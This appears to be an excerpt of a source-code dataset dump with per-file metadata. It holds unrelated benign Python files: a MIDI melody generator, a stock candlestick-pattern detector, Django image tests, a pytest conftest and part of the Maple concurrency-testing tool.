self.sc.d6(1)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.g4(1)
self.sc.d5(1)
self.sc.g5(1)
self.sc.a5(1)
self.sc.b5(2)
self.sc.modify_time(2)
# -------- ninety-eighth bar -------- #
# ---- major ---- #
self.sc.e6(0.5)
self.sc.b6(0.5)
self.sc.d6(1)
self.sc.modify_time(1.5, 1)
self.sc.d7(0.5)
self.sc.c7(1)
self.sc.modify_time(1, 1)
self.sc.e7(1)
self.sc.a6(1)
self.sc.d6(1)
self.sc.e6(1)
self.sc.d6(1)
self.sc.a5(1)
self.sc.d6(1)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.a4(1)
self.sc.e5(1)
self.sc.a5(1)
self.sc.b5(1)
self.sc.c6(2)
self.sc.modify_time(2)
# -------- ninety-ninth bar -------- #
# ---- major ---- #
self.sc.e6(1)
self.sc.d6(1)
self.sc.a6(1)
self.sc.d6(1)
self.sc.e6(1)
self.sc.d6(1)
self.sc.a5(1)
self.sc.d6(1)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.g4(1)
self.sc.d5(1)
self.sc.g5(1)
self.sc.a5(1)
self.sc.b5(2)
self.sc.modify_time(2)
# -------- one hundredth bar -------- #
# ---- major ---- #
self.sc.e6(1)
self.sc.d6(1)
self.sc.a6(1)
self.sc.d6(1)
self.sc.e6(1)
self.sc.d6(1)
self.sc.a5(1)
self.sc.d6(1)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.a4(1)
self.sc.e5(1)
self.sc.a5(1)
self.sc.b5(1)
self.sc.c6(2)
self.sc.modify_time(2)
# -------- one hundred-first bar -------- #
# ---- major ---- #
self.sc.e6(1)
self.sc.d6(1)
self.sc.a6(1)
self.sc.d6(1)
self.sc.e6(1)
self.sc.d6(1)
self.sc.a5(1)
self.sc.d6(1)
# -------- one hundred-second bar -------- #
# ---- major ---- #
self.sc.d6(8)
# -------- end -------- #
with open(self.name, 'wb') as f:
self.sc.get_midi().writeFile(f)
return self.name
| 25.69279 | 52 | 0.401714 | 12,404 | 73,764 | 2.36843 | 0.010158 | 0.5016 | 0.31333 | 0.345565 | 0.978555 | 0.970965 | 0.960889 | 0.956975 | 0.953741 | 0.936687 | 0 | 0.137237 | 0.376674 | 73,764 | 2,870 | 53 | 25.701742 | 0.501707 | 0.126647 | 0 | 0.98579 | 0 | 0 | 0.00022 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.000812 | false | 0 | 0.000406 | 0 | 0.00203 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
f53934204777631c2bc79d2e85f39c66065e068e | 20,769 | py | Python | Stockie/Candlestick.py | suparjotamin/stockie | c572620d847557d154e84d23a9915289f3ae8d6c | [
"MIT"
] | 3 | 2021-01-19T11:24:24.000Z | 2021-07-23T15:45:22.000Z | Stockie/Candlestick.py | suparjotamin/stockie | c572620d847557d154e84d23a9915289f3ae8d6c | [
"MIT"
] | 1 | 2020-11-29T08:49:46.000Z | 2020-11-29T14:47:55.000Z | Stockie/Candlestick.py | suparjotamin/stockie | c572620d847557d154e84d23a9915289f3ae8d6c | [
"MIT"
] | 2 | 2021-04-23T19:05:25.000Z | 2021-10-21T21:11:20.000Z | import numpy as np
np.seterr(divide='ignore', invalid='ignore')
def is_pattern(pattern, ohlc, ohlc_h1, ohlc_h2):
open = ohlc[0]
high = ohlc[1]
low = ohlc[2]
close = ohlc[3]
open_h1 = ohlc_h1[0]
high_h1 = ohlc_h1[1]
low_h1 = ohlc_h1[2]
close_h1 = ohlc_h1[3]
open_h2 = ohlc_h2[0]
high_h2 = ohlc_h2[1]
low_h2 = ohlc_h2[2]
close_h2 = ohlc_h2[3]
if pattern == 'doji':
return (abs(close - open) / (high - low) < 0.05) & \
(4*(high - np.maximum(close, open)) > (high - low)) & \
(4*(np.minimum(close, open) - low) > (high - low)) & \
(high > low)
else:
pass
if pattern == 'gravestone_doji':
return (abs(close - open) / (high - low) < 0.05) & \
(5*(high - np.maximum(close, open)) > (high - low)) & \
(5*(np.minimum(close, open) - low) < (high - low)) & \
(high > low)
else:
pass
if pattern == 'dragonfly_doji':
return (abs(close - open) / (high - low) < 0.05) & \
(5*(high - np.maximum(close, open)) < (high - low)) & \
(5*(np.minimum(close, open) - low) > (high - low)) & \
(high > low)
else:
pass
if pattern == 'bullish_spinning_top':
return (abs(close - open) / (high - low) > 0.1) & \
(abs(close - open) / (high - low) < 0.2) & \
(5*(high - np.maximum(close, open)) > (high - low)) & \
(5*(np.minimum(close, open) - low) > (high - low)) & \
(close > open)
else:
pass
if pattern == 'bearish_spinning_top':
return (abs(close - open) / (high - low) > 0.1) & \
(abs(close - open) / (high - low) < 0.2) & \
(5*(high - np.maximum(close, open)) > (high - low)) & \
(5*(np.minimum(close, open) - low) > (high - low)) & \
(close < open)
else:
pass
if pattern == 'inverted_Hammer':
return (abs(close - open) / (high - low) > 0.1) & \
(abs(close - open) / (high - low) < 0.3) & \
(5*(high - np.maximum(close, open)) > (high - low)) & \
(10*(np.minimum(close, open) - low) < (high - low)) & \
(close > open)
else:
pass
if pattern == 'shootingstar':
return (abs(close - open) / (high - low) > 0.1) & \
(abs(close - open) / (high - low) < 0.3) & \
(5*(high - np.maximum(close, open)) > (high - low)) & \
(10*(np.minimum(close, open) - low) < (high - low)) & \
(close < open)
else:
pass
if pattern == 'hanging_man':
return (abs(close - open) / (high - low) > 0.1) & \
(abs(close - open) / (high - low) < 0.3) & \
(10*(high - np.maximum(close, open)) < (high - low)) & \
(5*(np.minimum(close, open) - low) > (high - low)) & \
(close < open)
else:
pass
if pattern == 'hammer':
return (abs(close - open) / (high - low) > 0.1) & \
(abs(close - open) / (high - low) < 0.3) & \
(10*(high - np.maximum(close, open)) < (high - low)) & \
(5*(np.minimum(close, open) - low) > (high - low)) & \
(close > open)
else:
pass
if pattern == 'bullish_marubozu':
return (abs(close - open) >= 0.95*(high - low))& \
(close > open)
else:
pass
if pattern == 'bearish_marubozu':
return (abs(close - open) >= 0.95*(high - low))& \
(close < open)
else:
pass
if pattern == 'bullish_belt_hold':
return (abs(close - open) >= 0.90*(high - low))& \
(abs(open - low)*100 < (high - low) ) & \
(high > close) & \
(close > open)
else:
pass
if pattern == 'bearish_belt_hold':
return (abs(close - open) >= 0.90*(high - low))& \
(abs(open - high)*100 < (high - low)) & \
(low < close) & \
(close < open)
else:
pass
# Double
if pattern == 'bullish_engulfing':
return (open_h1 > close_h1) & \
(close > open) & \
(open_h1 < close) & \
(close_h1 > open) & \
(high_h1 < high) & \
(low_h1 > low)
else:
pass
if pattern == 'bearish_engulfing':
return (open_h1 < close_h1) & \
(close < open) & \
(open_h1 > close) & \
(close_h1 < open) & \
(high_h1 < high) & \
(low_h1 > low)
else:
pass
if pattern == 'tweezer_top':
return (open_h1 < close_h1) & \
(close < open) & \
(20*abs(high_h1 - high) < (high - low))
else:
pass
if pattern == 'tweezer_bottom':
return (open_h1 > close_h1) & \
(close > open) & \
(20*abs(low_h1 - low) < (high - low))
else:
pass
if pattern == 'bullish_separating_line':
return (open_h1 < open) & \
(open_h1 > close_h1) & \
(open < close)
else:
pass
if pattern == 'bearish_separating_line':
return (open_h1 > open) & \
(open_h1 < close_h1) & \
(open > close)
else:
pass
if pattern == 'piercing_line':
return (open_h1 > close_h1) & \
(open < close) & \
(close_h1 > open) & \
(open_h1 > close) & \
((open_h1 - close_h1) < 2*(close - close_h1))
else:
pass
if pattern == 'dark_cloud_cover':
return (open_h1 < close_h1) & \
(open > close) & \
(close_h1 < open) & \
(open_h1 < close) & \
((close_h1 - open_h1) < 2*(close_h1 - close))
else:
pass
if pattern == 'mathing_high':
return (open_h1 < close_h1) & \
(close > open) & \
(20*abs(high_h1 - high) < (high - low))
else:
pass
if pattern == 'mathing_low':
return (open_h1 > close_h1) & \
(close < open) & \
(20*abs(low_h1 - low) < (high - low))
else:
pass
if pattern == 'bullish_harami':
return (open_h1 > close_h1) &\
(close > open) &\
(open_h1 > close) &\
(close_h1 < open) &\
((open_h1 - close_h1) > 4*(close - open))
else:
pass
if pattern == 'bearish_harami':
return (open_h1 < close_h1) &\
(close < open) &\
(open_h1 < close) &\
(close_h1 > open) &\
((close_h1 - open_h1) > 4*(open - close))
else:
pass
if pattern == 'bullish_harami_cross':
return (open_h1 > close_h1) & \
(open_h1 > close) & \
(close_h1 < open) & \
(abs(close - open) / (high - low) < 0.05) & \
(4*(high - np.maximum(close, open)) > (high - low)) & \
(4*(np.minimum(close, open) - low) > (high - low))
else:
pass
if pattern == 'bearish_harami_cross':
return (open_h1 < close_h1) & \
(open_h1 < close) & \
(close_h1 > open) & \
(abs(close - open) / (high - low) < 0.05) & \
(4*(high - np.maximum(close, open)) > (high - low)) & \
(4*(np.minimum(close, open) - low) > (high - low))
else:
pass
if pattern == 'descending_hawk':
return (open_h1 < close_h1) & \
(close > open) & \
(open_h1 < open) & \
(close_h1 > close)
else:
pass
if pattern == 'homing_pigeon':
return (open_h1 > close_h1) & \
(close < open) & \
(open_h1 > open) & \
(close_h1 < close)
else:
pass
if pattern == 'bullish_in_neck':
return (open_h1 < close_h1) & \
(close < open) & \
(20*abs(close_h1 - close) < (high - low_h1))
else:
pass
if pattern == 'bearish_in_neck':
return (open_h1 > close_h1) & \
(close > open) & \
(20*abs(close_h1 - close) < (high_h1 - low))
else:
pass
if pattern == 'bullish_on_neck':
return (open_h1 < close_h1) & \
(close < open) & \
(20*abs(high_h1 - low) < (high - low_h1))
else:
pass
if pattern == 'bearish_on_neck':
return (open_h1 > close_h1) & \
(close > open) & \
(20*abs(low_h1 - high) < (high_h1 - low))
else:
pass
if pattern == 'bullish_kicking':
return (open_h1 > close_h1) & \
(open < close) & \
((open_h1 - close_h1) > 0.9*(high_h1 - low_h1)) & \
((close_h1 - open_h1) > 0.9*(high - low)) & \
(open_h1 < open)
else:
pass
if pattern == 'bearish_kicking':
return (open_h1 < close_h1) & \
(open > close) & \
((close_h1 - open_h1) > 0.9*(high_h1 - low_h1)) & \
((open - close) > 0.9*(high - low)) & \
(open_h1 > open)
else:
pass
#triple
if pattern == 'morning_star':
return (open_h2 > close_h2) &\
(3*abs(close_h1 - open_h1) < abs(close_h2 - open_h2)) &\
(3*abs(close_h1 - open_h1) < abs(close - open)) &\
(np.maximum(open_h1, close_h1) < close_h2) &\
(np.maximum(open_h1, close_h1) < open) &\
(high_h1 > low_h1) &\
(close > open)
else:
pass
if pattern == 'evening_star':
return (open_h2 < close_h2) &\
(3*abs(close_h1 - open_h1) < abs(close_h2 - open_h2)) &\
(3*abs(close_h1 - open_h1) < abs(close - open)) &\
(np.minimum(open_h1, close_h1) > close_h2) &\
(np.minimum(open_h1, close_h1) > open) &\
(high_h1 > low_h1) &\
(close < open)
else:
pass
if pattern == 'morning_doji_star':
return (open_h2 > close_h2) &\
(abs(close_h1 - open_h1)/(high_h1 - low_h1) < 0.05) &\
(np.minimum(open_h1, close_h1) < close_h2) &\
(np.minimum(open_h1, close_h1) < open) &\
(close > open)
else:
pass
if pattern == 'evening_doji_star':
return (open_h2 < close_h2) &\
(abs(close_h1 - open_h1)/(high_h1 - low_h1) < 0.05) &\
(np.minimum(open_h1, close_h1) > close_h2) &\
(np.minimum(open_h1, close_h1) > open) &\
(close < open)
else:
pass
if pattern == 'three_white_soldier':
return (open_h2 < close_h2) &\
(2*abs(close_h2 - open_h2) > (high_h2 - low_h2)) &\
(open_h1 < close_h1) &\
(2*abs(close_h1 - open_h1) > (high_h1 - low_h1)) &\
(open < close) &\
(2*abs(close - open) > (high - low)) &\
(0.5*(close_h2 + open_h2) < 0.5*(close_h1 + open_h1)) &\
(0.5*(close_h1 + open_h1) < 0.5*(close + open)) &\
(close_h1 > close_h2) &\
(close > close_h1)
else:
pass
if pattern == 'three_black_crow':
return (open_h2 > close_h2) &\
(2*abs(close_h2 - open_h2) > (high_h2 - low_h2)) &\
(open_h1 > close_h1) &\
(2*abs(close_h1 - open_h1) > (high_h1 - low_h1)) &\
(open > close) &\
(2*abs(close - open) > (high - low)) &\
(0.5*(close_h2 + open_h2) > 0.5*(close_h1 + open_h1)) &\
(0.5*(close_h1 + open_h1) > 0.5*(close + open)) &\
(close_h1 < close_h2) &\
(close < close_h1)
else:
pass
if pattern == 'three_inside_up':
return (open_h2 > close_h2) &\
(open_h1 < close_h1) &\
(open < close) &\
(open_h1 < open) &\
((open + close) > (open_h1 + close_h1)) &\
(open_h2 > close_h1) &\
(close_h2 < open_h1)
else:
pass
if pattern == 'three_inside_down':
return (open_h2 < close_h2) &\
(open_h1 > close_h1) &\
(open > close) &\
(open_h1 > open) &\
((open + close) < (open_h1 + close_h1))&\
(close_h2 > open_h1) &\
(open_h2 < close_h1)
else:
pass
if pattern == 'deliberation':
return (open_h2 < close_h2) &\
(2*abs(close_h2 - open_h2) > (high_h2 - low_h2)) &\
(open_h1 < close_h1) &\
(2*abs(close_h1 - open_h1) > (high_h1 - low_h1)) &\
(open < close) &\
(3*abs(close - open) < abs(close_h1 - open_h1)) &\
(0.5*(close_h2 + open_h2) < 0.5*(close_h1 + open_h1)) &\
(0.5*(close_h1 + open_h1) < 0.5*(close + open)) &\
(close_h1 > close_h2) &\
(close > close_h1)
else:
pass
if pattern == 'three_outside_up':
return (open_h2 > close_h2) &\
(open_h1 < close_h1) &\
(open < close) &\
(open_h1 < open) &\
((open + close) > (open_h1 + close_h1)) &\
(open_h2 < close_h1) &\
(close_h2 > open_h1)
else:
pass
if pattern == 'three_outside_down':
return (open_h2 < close_h2) &\
(open_h1 > close_h1) &\
(open > close) &\
(open_h1 > open) &\
((open + close) < (open_h1 + close_h1))&\
(close_h2 < open_h1) &\
(open_h2 > close_h1)
else:
pass
if pattern == 'bullish_abandoned_baby':
return (open_h2 > close_h2) &\
(3*abs(close_h1 - open_h1) < abs(close_h2 - open_h2)) &\
(3*abs(close_h1 - open_h1) < abs(close - open)) &\
(np.maximum(open_h1, close_h1) < close_h2) &\
(np.maximum(open_h1, close_h1) < open) &\
(high_h1 > low_h1) &\
(high_h1 < low_h2) &\
(high_h1 < low) &\
(close > open)
else:
pass
if pattern == 'bearish_abandoned_baby':
return (open_h2 < close_h2) &\
(3*abs(close_h1 - open_h1) < abs(close_h2 - open_h2)) &\
(3*abs(close_h1 - open_h1) < abs(close - open)) &\
(np.minimum(open_h1, close_h1) > close_h2) &\
(np.minimum(open_h1, close_h1) > open) &\
(high_h1 > low_h1) &\
(low_h1 > high_h2) &\
(low_h1 > high) &\
(close < open)
else:
pass
if pattern == 'bullish_stick_sandwich':
return (open_h2 > close_h2) &\
(open_h1 < close_h1) &\
(open > close) &\
(open_h1 > close_h2) &\
(open_h2 < close_h1) &\
(open > close_h1) &\
(close < open_h1) &\
(2*(open_h2 - close_h2) > (high_h2 - low_h2)) &\
(2*(open - close) > (high - low)) &\
(20*abs(close_h2 - close) < (high - np.minimum(low_h2,low)))
else:
pass
if pattern == 'bearish_stick_sandwich':
return (open_h2 < close_h2) &\
(open_h1 > close_h1) &\
(open < close) &\
(open_h1 < close_h2) &\
(open_h2 > close_h1) &\
(open < close_h1) &\
(close > open_h1) &\
(2*(close_h2 - open_h2) > (high_h2 - low_h2)) &\
(2*(close - open) > (high - low)) &\
(20*abs(close_h2 - close) < (low - np.maximum(high_h2, high)))
else:
pass
if pattern == 'bullish_side_by_side_white_line':
return (open_h2 < close_h2) &\
(open_h1 < close_h1) &\
(open < close) &\
(2*(close_h2 - open_h2) > (high_h2 - low_h2)) &\
(2*(close_h1 - open_h1) > (high_h1 - low_h1)) &\
(2*(close - open) > (high - low)) &\
(open_h1 > close_h2) &\
(20*abs(close_h1 - close) < (np.maximum(high, high_h1)-np.minimum(low, low_h1))) &\
(20*abs(open_h1 - open) < (np.maximum(high, high_h1)-np.minimum(low, low_h1)))
else:
pass
if pattern == 'bearish_side_by_side_black_line':
return (open_h2 > close_h2) &\
(open_h1 > close_h1) &\
(open > close) &\
(2*(open_h2 - close_h2) > (high_h2 - low_h2)) &\
(2*(open_h1 - close_h1) > (high_h1 - low_h1)) &\
(2*(open - close) > (high - low)) &\
(open_h1 < close_h2) &\
(20*abs(close_h1 - close) < (np.maximum(high, high_h1)-np.minimum(low, low_h1))) &\
(20*abs(open_h1 - open) < (np.maximum(high, high_h1)-np.minimum(low, low_h1)))
else:
pass
if pattern == 'bearish_side_by_side_white_line':
return (open_h2 > close_h2) &\
(open_h1 < close_h1) &\
(open < close) &\
(2*(open_h2 - close_h2) > (high_h2 - low_h2)) &\
(2*(close_h1 - open_h1) > (high_h1 - low_h1)) &\
(2*(close - open) > (high - low)) &\
(close_h1 < close_h2) &\
(20*abs(close_h1 - close) < (np.maximum(high, high_h1)-np.minimum(low, low_h1))) &\
(20*abs(open_h1 - open) < (np.maximum(high, high_h1)-np.minimum(low, low_h1)))
else:
pass
if pattern == 'bullish_side_by_side_black_line':
return (open_h2 < close_h2) &\
(open_h1 > close_h1) &\
(open > close) &\
(2*(close_h2 - open_h2) > (high_h2 - low_h2)) &\
(2*(open_h1 - close_h1) > (high_h1 - low_h1)) &\
(2*(open - close) > (high - low)) &\
(close_h1 > close_h2) &\
(20*abs(close_h1 - close) < (np.maximum(high, high_h1)-np.minimum(low, low_h1))) &\
(20*abs(open_h1 - open) < (np.maximum(high, high_h1)-np.minimum(low, low_h1)))
else:
pass
if pattern == 'upside_gap_three':
return (open_h2 < close_h2) &\
(open_h1 < close_h1) &\
(open > close) &\
(close_h2 < open_h1) &\
(open > open_h1) &\
(close < close_h2)
else:
pass
if pattern == 'downside_gap_three':
return (open_h2 > close_h2) &\
(open_h1 > close_h1) &\
(open < close) &\
(close_h2 > open_h1) &\
(open < open_h1) &\
(close > close_h2)
else:
pass
if pattern == 'upside_gap_two_crow':
return (open_h2 < close_h2) &\
(open_h1 > close_h1) &\
(open > close) &\
(open_h1 < open) &\
(close_h1 > close) &\
(close_h2 < close)
else:
pass
if pattern == 'unique_three_river_bottom':
return (open_h2 > close_h2) &\
(open_h1 > close_h1) &\
(open < close) &\
((close_h1 - low_h1) > 2*(open_h1 - close_h1)) &\
(close < close_h1)&\
(open > low_h1)
else:
pass
if pattern == 'bullish_tri_star':
return (abs(close - open) / (high - low) < 0.05) & \
(4*(high - np.maximum(close, open)) > (high - low)) & \
(4*(np.minimum(close, open) - low) > (high - low)) & \
(high > low)& \
(abs(close_h1 - open_h1) / (high_h1 - low_h1) < 0.05) & \
(4*(high_h1 - np.maximum(close_h1, open_h1)) > (high_h1 - low_h1)) & \
(4*(np.minimum(close_h1, open_h1) - low_h1) > (high_h1 - low_h1)) & \
(high_h1 > low_h1)& \
(abs(close_h2 - open_h2) / (high_h2 - low_h2) < 0.05) & \
(4*(high_h2 - np.maximum(close_h2, open_h2)) > (high_h2 - low_h2)) & \
(4*(np.minimum(close_h2, open_h2) - low_h2) > (high_h2 - low_h2)) & \
(high_h2 > low_h2) & \
(close_h2 > close_h1) & \
(close > close_h1)
else:
pass
if pattern == 'bearish_tri_star':
return (abs(close - open) / (high - low) < 0.05) & \
(4*(high - np.maximum(close, open)) > (high - low)) & \
(4*(np.minimum(close, open) - low) > (high - low)) & \
(high > low)& \
(abs(close_h1 - open_h1) / (high_h1 - low_h1) < 0.05) & \
(4*(high_h1 - np.maximum(close_h1, open_h1)) > (high_h1 - low_h1)) & \
(4*(np.minimum(close_h1, open_h1) - low_h1) > (high_h1 - low_h1)) & \
(high_h1 > low_h1)& \
(abs(close_h2 - open_h2) / (high_h2 - low_h2) < 0.05) & \
(4*(high_h2 - np.maximum(close_h2, open_h2)) > (high_h2 - low_h2)) & \
(4*(np.minimum(close_h2, open_h2) - low_h2) > (high_h2 - low_h2)) & \
(high_h2 > low_h2) & \
(close_h2 < close_h1) & \
(close < close_h1)
else:
pass
if pattern == 'three_star_in_the_north':
return (close_h2 > open_h2) & \
(close_h1 > open_h1) & \
(close > open) & \
(close_h2 - open_h2 > close_h1 - open_h1) & \
(close_h1 - open_h1 > close - open) & \
(close_h2 < close_h1) & \
(close_h1 < close)
else:
pass
if pattern == 'three_star_in_the_south':
return (close_h2 < open_h2) & \
(close_h1 < open_h1) & \
(close < open) & \
(close_h2 - open_h2 < close_h1 - open_h1) & \
(close_h1 - open_h1 < close - open) & \
(close_h2 > close_h1) & \
(close_h1 > close)
else:
pass
| 32.400936 | 92 | 0.478068 | 2,563 | 20,769 | 3.611003 | 0.040577 | 0.10967 | 0.096272 | 0.088493 | 0.93409 | 0.918422 | 0.899946 | 0.86094 | 0.833171 | 0.820313 | 0 | 0.059785 | 0.35813 | 20,769 | 640 | 93 | 32.451563 | 0.634461 | 0.000578 | 0 | 0.759227 | 0 | 0 | 0.053547 | 0.016358 | 0 | 0 | 0 | 0 | 0 | 1 | 0.001757 | false | 0.108963 | 0.001757 | 0 | 0.112478 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 8 |
19137f23cfdc70ee3c52047c26a9690fc43e26eb | 121 | py | Python | spice21py/spice21py/protos/__init__.py | HW21/Spice21 | 127cfb37b98086795841b0aef0cd4e93926f3622 | [
"BSD-3-Clause"
] | 11 | 2020-09-16T06:33:31.000Z | 2022-03-22T06:46:32.000Z | spice21py/spice21py/protos/__init__.py | HW21/Spice21 | 127cfb37b98086795841b0aef0cd4e93926f3622 | [
"BSD-3-Clause"
] | 4 | 2020-11-23T04:44:52.000Z | 2022-02-13T22:52:38.000Z | spice21py/spice21py/protos/__init__.py | HW21/Spice21 | 127cfb37b98086795841b0aef0cd4e93926f3622 | [
"BSD-3-Clause"
] | 3 | 2021-01-17T05:21:51.000Z | 2021-08-18T03:43:02.000Z |
# Paper-over these uglified module names
from .spice21_pb2 import *
from .bsim4_pb2 import *
from .mos_pb2 import *
| 20.166667 | 41 | 0.743802 | 18 | 121 | 4.833333 | 0.666667 | 0.310345 | 0.298851 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.061224 | 0.190083 | 121 | 5 | 42 | 24.2 | 0.826531 | 0.31405 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
19469ead12933b20ec4530d7539a01072ef15d21 | 1,892 | py | Python | daguerre/tests/unit/test_models.py | Styria-Digital/django-daguerre | 6737ec957dda5fb9df9bf8b5505c1da276e0bc2d | [
"BSD-3-Clause"
] | null | null | null | daguerre/tests/unit/test_models.py | Styria-Digital/django-daguerre | 6737ec957dda5fb9df9bf8b5505c1da276e0bc2d | [
"BSD-3-Clause"
] | 1 | 2016-06-08T10:52:20.000Z | 2016-08-22T14:01:59.000Z | daguerre/tests/unit/test_models.py | Styria-Digital/django-daguerre | 6737ec957dda5fb9df9bf8b5505c1da276e0bc2d | [
"BSD-3-Clause"
] | 1 | 2016-06-08T07:52:37.000Z | 2016-06-08T07:52:37.000Z | from daguerre.models import AdjustedImage
from daguerre.tests.base import BaseTestCase
class AreaTestCase(BaseTestCase):
def test_delete_adjusted_images__save(self):
"""
Saving an adjusted image should delete "related" adjusted images
that use areas.
"""
storage_path = self.create_image('100x100.png')
kwargs = {
'storage_path': storage_path,
'adjusted': storage_path,
}
area = self.create_area(storage_path=storage_path)
adjusted1 = AdjustedImage.objects.create(requested='fit|50|50',
**kwargs)
adjusted2 = AdjustedImage.objects.create(requested='crop|50|50',
**kwargs)
area.save()
self.assertRaises(AdjustedImage.DoesNotExist,
AdjustedImage.objects.get,
pk=adjusted2.pk)
AdjustedImage.objects.get(pk=adjusted1.pk)
def test_delete_adjusted_images__delete(self):
"""
Deleting an adjusted image should delete "related" adjusted images that
use areas.
"""
storage_path = self.create_image('100x100.png')
kwargs = {
'storage_path': storage_path,
'adjusted': storage_path,
}
area = self.create_area(storage_path=storage_path)
adjusted1 = AdjustedImage.objects.create(requested='fit|50|50',
**kwargs)
adjusted2 = AdjustedImage.objects.create(requested='crop|50|50',
**kwargs)
area.delete()
self.assertRaises(AdjustedImage.DoesNotExist,
AdjustedImage.objects.get,
pk=adjusted2.pk)
AdjustedImage.objects.get(pk=adjusted1.pk)
| 35.698113 | 79 | 0.558668 | 170 | 1,892 | 6.064706 | 0.258824 | 0.128031 | 0.069835 | 0.085354 | 0.85742 | 0.805044 | 0.805044 | 0.805044 | 0.805044 | 0.805044 | 0 | 0.029436 | 0.353594 | 1,892 | 52 | 80 | 36.384615 | 0.813573 | 0.086152 | 0 | 0.742857 | 0 | 0 | 0.060096 | 0 | 0 | 0 | 0 | 0 | 0.057143 | 1 | 0.057143 | false | 0 | 0.057143 | 0 | 0.142857 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
1951c2319c1577a6832a9ce208299415a01ccedb | 110 | py | Python | tests/conftest.py | uranusjr/snafu | ddcbf8dc8f26fbab6f352058d4b3e62fd01ea331 | [
"ISC"
] | 27 | 2017-10-09T02:41:23.000Z | 2020-12-18T22:42:55.000Z | tests/conftest.py | imbi7py/snafu | ddcbf8dc8f26fbab6f352058d4b3e62fd01ea331 | [
"ISC"
] | 22 | 2018-02-22T17:08:50.000Z | 2021-11-07T09:20:18.000Z | tests/conftest.py | imbi7py/snafu | ddcbf8dc8f26fbab6f352058d4b3e62fd01ea331 | [
"ISC"
] | 2 | 2018-01-18T21:03:30.000Z | 2021-01-18T05:14:18.000Z | import unittest.mock
import sys
def pytest_collectstart():
sys.modules['winreg'] = unittest.mock.Mock()
| 15.714286 | 48 | 0.736364 | 14 | 110 | 5.714286 | 0.642857 | 0.3 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.136364 | 110 | 6 | 49 | 18.333333 | 0.842105 | 0 | 0 | 0 | 0 | 0 | 0.054545 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | true | 0 | 0.5 | 0 | 0.75 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
273e10d173a04288c862d2bb322c990309057f1c | 44,442 | py | Python | script/maple/idiom/main.py | SnowOnion/maple | 14b2769a07473f9eca6ea1bc7f57bbefe1db46f4 | [
"Apache-2.0"
] | 58 | 2015-03-18T07:37:05.000Z | 2022-01-17T18:15:28.000Z | script/maple/idiom/main.py | SnowOnion/maple | 14b2769a07473f9eca6ea1bc7f57bbefe1db46f4 | [
"Apache-2.0"
] | 7 | 2015-08-26T16:22:52.000Z | 2021-04-01T05:24:39.000Z | script/maple/idiom/main.py | SnowOnion/maple | 14b2769a07473f9eca6ea1bc7f57bbefe1db46f4 | [
"Apache-2.0"
] | 24 | 2015-03-18T07:35:06.000Z | 2022-02-23T14:01:57.000Z | """Copyright 2011 The University of Michigan
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
Authors - Jie Yu (jieyu@umich.edu)
"""
import os
import sys
import subprocess
import optparse
from maple.core import config
from maple.core import logging
from maple.core import pintool
from maple.core import static_info
from maple.core import testing
from maple.pct import history as pct_history
from maple.race import pintool as race_pintool
from maple.idiom import iroot
from maple.idiom import memo
from maple.idiom import history as idiom_history
from maple.idiom import pintool as idiom_pintool
from maple.idiom import offline_tool as idiom_offline_tool
from maple.idiom import testing as idiom_testing
# global variables
_separator = '---'
def get_prefix(pin, tool=None):
c = []
c.append(pin.pin())
c.extend(pin.options())
if tool != None:
c.extend(tool.options())
c.append('--')
return c
def separate_opt_prog(argv):
if not _separator in argv:
return argv, []
else:
opt_argv = argv[0:argv.index(_separator)]
prog_argv = argv[argv.index(_separator)+1:]
return opt_argv, prog_argv
def __display_image_table(output, options):
sinfo = static_info.StaticInfo()
sinfo.load(options.sinfo_in)
sinfo.display_image_table(output)
def __display_inst_table(output, options):
sinfo = static_info.StaticInfo()
sinfo.load(options.sinfo_in)
sinfo.display_inst_table(output)
def __display_iroot_db(output, options):
sinfo = static_info.StaticInfo()
sinfo.load(options.sinfo_in)
iroot_db = iroot.iRootDB(sinfo)
iroot_db.load(options.iroot_in)
